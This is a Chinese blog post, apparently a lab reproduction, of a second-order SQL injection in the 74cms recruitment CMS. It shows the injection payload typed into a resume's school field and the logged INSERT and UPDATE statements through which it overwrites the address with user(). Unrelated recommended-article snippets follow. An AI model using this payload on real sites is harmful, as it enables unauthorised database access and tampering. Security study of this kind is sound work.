74cms二次注入复现

最新推荐文章于 2025-04-11 17:35:50 发布
最新推荐文章于 2025-04-11 17:35:50 发布
阅读量931 收藏 3
点赞数 5
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63615772/article/details/141006036
版权

对74cms二次注入进行复现

黑盒复现

二次注入的原理

插入数据到数据库

当显示的时候数据是从数据库取出来的,当我们插入的数据为payload的时候,取出来的数据在显示的时候,显示的数据通常会去数据库

查找数据如使用select 显示的数据 from 表 where id =xxx, xxx为我们的插入的payload 从而造成二次注入

填写简历 注意这里的通训地址 我们填的是上海

image-20240808053325591

在学校这一栏 用二次注入

image-20240808053511692

显示

出来的通训地址已经从上海变成了user()

image-20240808053911749

白盒分析

http://192.168.206.136:81/user/personal/personal_resume.php?act=make1

image-20240808054613110

根据url 找到源码

根据审计工具找到执行的代码

image-20240808054733282

INSERT INTO qs_resume_tmp (`id`, `subsite_id`, `uid`, `display`, `display_name`, `audit`, `title`, `fullname`, `sex`, `sex_cn`, `nature`, `nature_cn`, `trade`, `trade_cn`, `birthdate`, `height`, `marriage`, `marriage_cn`, `experience`, `experience_cn`, `district`, `sdistrict`, `district_cn`, `wage`, `wage_cn`, `householdaddress`, `education`, `education_cn`, `tag`, `telephone`, `email`, `email_notify`, `qq`, `address`, `website`, `recentjobs`, `intention_jobs`, `specialty`, `photo`, `photo_img`, `photo_audit`, `photo_display`, `addtime`, `refreshtime`, `talent`, `complete`, `complete_percent`, `user_status`, `key`, `click`, `tpl`) VALUES ('7', '0', '1', '1', '1', '1', '\xBC\xF2\xC0\xFA', '1', '1', '\xC4\xD0', '0', '', '', '', '1985', '180', '1', 'δ\xBB\xE9', '75', '1\xC4\xEA\xD2\xD4\xCF\xC2', '0', '0', '', '0', '', '\xC9Ϻ\xA3', '66', '\xB8\xDF\xD6\xD0', '155,\xD0\xCE\xCF\xF3\xBA\xC3', '20239', 'xxx', '0', '', '\xC9Ϻ\xA3', '', '', '', '', '0', '', '1', '1', '1723067195', '1723067195', '1', '2', '15', '1', '', '1', '')

image-20240808055050087

UPDATE qs_resume SET `photo`='0', `complete`='1', `complete_percent`='60', `key`='\xB5\xE7\xD7ӿƼ\xBC\xB4\xF3ѧ',address=user()# Ӫ\xCF\xFA\xD7ܼ\xE0 \xCAг\xA1\xD7ܼ\xE0 1000  Ӫ\xCF\xFA00 \xD7ܼ\xE000 \xCAг\xA100 \xB8\xDF\xD6\xD000 \xCE\xDE', `refreshtime`='1723067645' WHERE uid='1' AND id='7'

这里时学校名称 的 电子科技大学’,address=user()# 在第四步保存的时候,执行了更新语句 address=user(),导致了二次注入

image-20240808055754980

插入语句

SELECT * FROM qs_ad  WHERE alias='QS_alltopimg' AND( starttime<=1723068008  OR starttime=0 ) AND (deadline>=1723068008 OR deadline='0' ) AND is_display=1  ORDER BY show_order DESC  LIMIT 0,1

其实就是 第一步填写简历

image-20240808061059254

执行了 update 将通训地址1234567写入了数据库

2024/8/8 星期四 6:10	UPDATE qs_resume_tmp SET `uid`='1', `title`='\xBC\xF2\xC0\xFA', `fullname`='1', `sex`='1', `sex_cn`='\xC4\xD0', `birthdate`='1985', `height`='180', `marriage`='1', `marriage_cn`='δ\xBB\xE9', `experience`='75', `experience_cn`='1\xC4\xEA\xD2\xD4\xCF\xC2', `householdaddress`='\xC9Ϻ\xA3', `education`='66', `education_cn`='\xB8\xDF\xD6\xD0', `tag`='155,\xD0\xCE\xCF\xF3\xBA\xC3', `telephone`='20239', `email`='2274842122@qq.com', `email_notify`='0', `address`='1234567', `website`='', `qq`='', `refreshtime`='1723068639', `subsite_id`='0', `display_name`='1' WHERE  id='8'  AND uid='1'

image-20240808061352976

第4步的时候 将 2222’,address=user()# 插入数据库

INSERT INTO qs_resume_education (`uid`, `pid`, `start`, `endtime`, `school`, `speciality`, `education`, `education_cn`) VALUES ('1', '8', '2023\xC4\xEA7\xD4\xC2', '2028\xC4\xEA2\xD4\xC2', '2222\',address=user()#', '\xCE\xDE', '65', '\xB3\xF5\xD6\xD0')

同时在保存的更新了 通信地址address=user() 导致二次注入

UPDATE qs_resume SET `photo`='0', `complete`='1', `complete_percent`='60', `key`='2222',address=user()# Ӫ\xCF\xFA\xD7ܼ\xE0 \xD3\xEF\xD2\xF4\xCA\xD3Ƶ\xBF\xAA\xB7\xA2\xB9\xA4\xB3\xCCʦ 1000  Ӫ\xCF\xFA00 \xD7ܼ\xE000 \xD3\xEF\xD2\xF400 \xD2\xF4\xCA\xD300 \xD2\xF4\xCA\xD3Ƶ0 \xCA\xD3Ƶ00 \xBF\xAA\xB7\xA200 \xBF\xAA\xB7\xA2\xB9\xA4\xB3\xCCʦ \xB9\xA4\xB3\xCC00 \xB9\xA4\xB3\xCCʦ0 \xB8\xDF\xD6\xD000 \xCE\xDE', `refreshtime`='1723068893' WHERE uid='1' AND id='8'

A4\xB3\xCCʦ0 \xB8\xDF\xD6\xD000 \xCE\xDE’, refreshtime=‘1723068893’ WHERE uid=‘1’ AND id=‘8’
k大帅1
关注
ServletRequest为什么可以强转HttpServletRequest
码海淹没的小强的博客
06-27 2619
代码中常见这样的代码: HttpServletRequest httpRequest = (HttpServletRequest) servletRequest String usertoken = httpRequest.getHeader("usertoken"); String url = httpRequest.getRequestURI().substring(httpRequest.getContextPath().length()); 转换原因 HttpServletRequestS
HttpServletRequestServerHttpRequest获取访问者真实IP,并设置ip白名单
SHUKAI618的博客
05-12 2821
在项目记录日志的时候网关处理IP白名单的时候,通常会获取用户IP,一般都会从HttpServletRequestServerHttpRequest获取访问者真实IP 1.从HttpServletRequest中获取(日志打印的情况): public static String getIpAddr(HttpServletRequest request){ String ip = null; // X-Forwarded-For:Squid 服务代理 Str
HttpServletRequestS
06-27
HttpservletRequest简介,获取请求行的相关信息,获取网络连接信息
java HttpServletRequest HttpServletResponse
最新发布
qq_48763502的博客
04-11 950
这两个对象是 Java Web 开发的核心,几乎所有 Web 框架(如 Spring MVC)底层都依赖它们进行 HTTP 请求响应处理。是 Java Servlet API 提供的接口,用于封装服务器对客户端的 HTTP 响应。是 Java Servlet API 提供的接口,用于封装客户端的 HTTP 请求信息。,并增加了 HTTP 协议相关的功能。,并增加了 HTTP 协议相关的功能。
http-server 超轻量级web服务器
weixin_33785972的博客
02-11 878
有的时候做前端,想要运行一些代码,但是又没有必要使用tomcat或者Apache http server,这个时候一个轻量级的简单的http server就可以搞定了。 Http-server是基于nodejs的http服务器,它最大好处就是:   可以使任意一个目录成为服务器的目录,完全抛开后台的沉重工程,直接运行想要的js代码。   1 安装nodejs   为了运行http-...
HttpServletRequest
Thewei666的博客
04-19 2358
在Servlet API中,定义了一个HttpServletRequest接口,它继承自ServletRequest接口,专门用于封装HTTP请求消息。
ServerHttpRequest HttpServletRequest区别以及获取IP
热门推荐
qililong88的博客
08-04 1万+
获取ip
NodeJs——(8)http.ServerRequest的过程
weixin_33762321的博客
06-26 474
(25)http.ServerRequest的过程 ①http.ServerRequest提供了3个事件用于控制请求体传输: 【1】data:当请求体数据到来时,该事件被触发,提供一个参数给回调函数,是接受到的数据,该事件可能被多次调用(所有data按顺序的集合,是请求体数据)。如果该事件没有被监听,请求体将被抛弃; 【2】end:当请求体数据完成...
java HttpServletRequestHttpServletResponse详解
08-31
在进行Java Web开发时,理解HttpServletRequestHttpServletResponse的工作原理使用方法至关重要,这有助于你有效地处理客户端服务器之间的交互,提供正确的服务反馈。这两个接口的熟练掌握是成为专业Java ...
HttpServletRequest ServerHttpRequest
09-22
HttpServletRequest ServerHttpRequest 是用于获取客户端的 IP 地址的两个接口。HttpServletRequestJava Servlet API 中的一部分,用于获取客户端发送的 HTTP 请求的信息,包括IP 地址。而 ServerHttpRequest ...
获取访问者真实IP:HttpServletRequestServerHttpRequest
fo_xi的博客
11-28 743
HttpServletRequestServerHttpRequest获取访问者真实IP
HTTP请求头概述(HttpServletRequest
01-18
HTTP客户程序(例如浏览器),向服务器发送请求的时候必须指明请求类型(一般是GET或者POST)。如有必要,客户程序还可以选择发送其他的请求头。大多数请求头并不是必需的,但Content-Length除外。对于POST请求来说Content-Length必须出现。  下面是一些最常见的请求头 ......
HttpServletRequest概述、相关方法、获取请求行信息、获取请求头信息相关方法及获取请求参数相关方法
m0_61961937的博客
09-22 1万+
HttpServletRequest概述及相关方法
【Servlet】HttpServletRequest、HttpServletResponse
qq_41233305的博客
06-29 3251
HttpServletRequest、HttpServletResponse、以及前后端交互案例:表白墙
ServerHttpRequest HttpServletRequest 获取 IP 地址 学习笔记
qq_39960204的博客
08-16 9457
ServerHttpRequest HttpServletRequest 获取 IP 地址 学习笔记 最近在做一个请求白名单IP地址的功能;在拦截器 或者 service 层做校验判断,就用到了ServerHttpRequest HttpServletRequest 获取 IP 地址的两种方式 做个记录笔记,如果有不对的地方可以直接私信我 代码 ServerHttpRequest 获取 IP 地址 这个是在拦截器里面用的,我本来是写到公用的的工具包里面的,但是运行会报错,把方法封装到拦截器里面运行又
HttpServletRequest、通过request获得请求头、请求体等、解决中文乱码等问题
weixinhmz的博客
05-03 166
HttpServletRequest、通过request获得请求头、请求体等、解决中文乱码等问题
HttpServletRequestHttpServletResponse API
时间海绵
09-12 1339
HttpServletRequest接口 在Servlet中,通过HttpServletRequest对象来获取来自客户服务器端的一些数据 类别 方法 说明 协议 getMethod() getProtocol() getScheme() HTTP协议信息 客户信息 getRemoteAddr() getRemoteHost()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值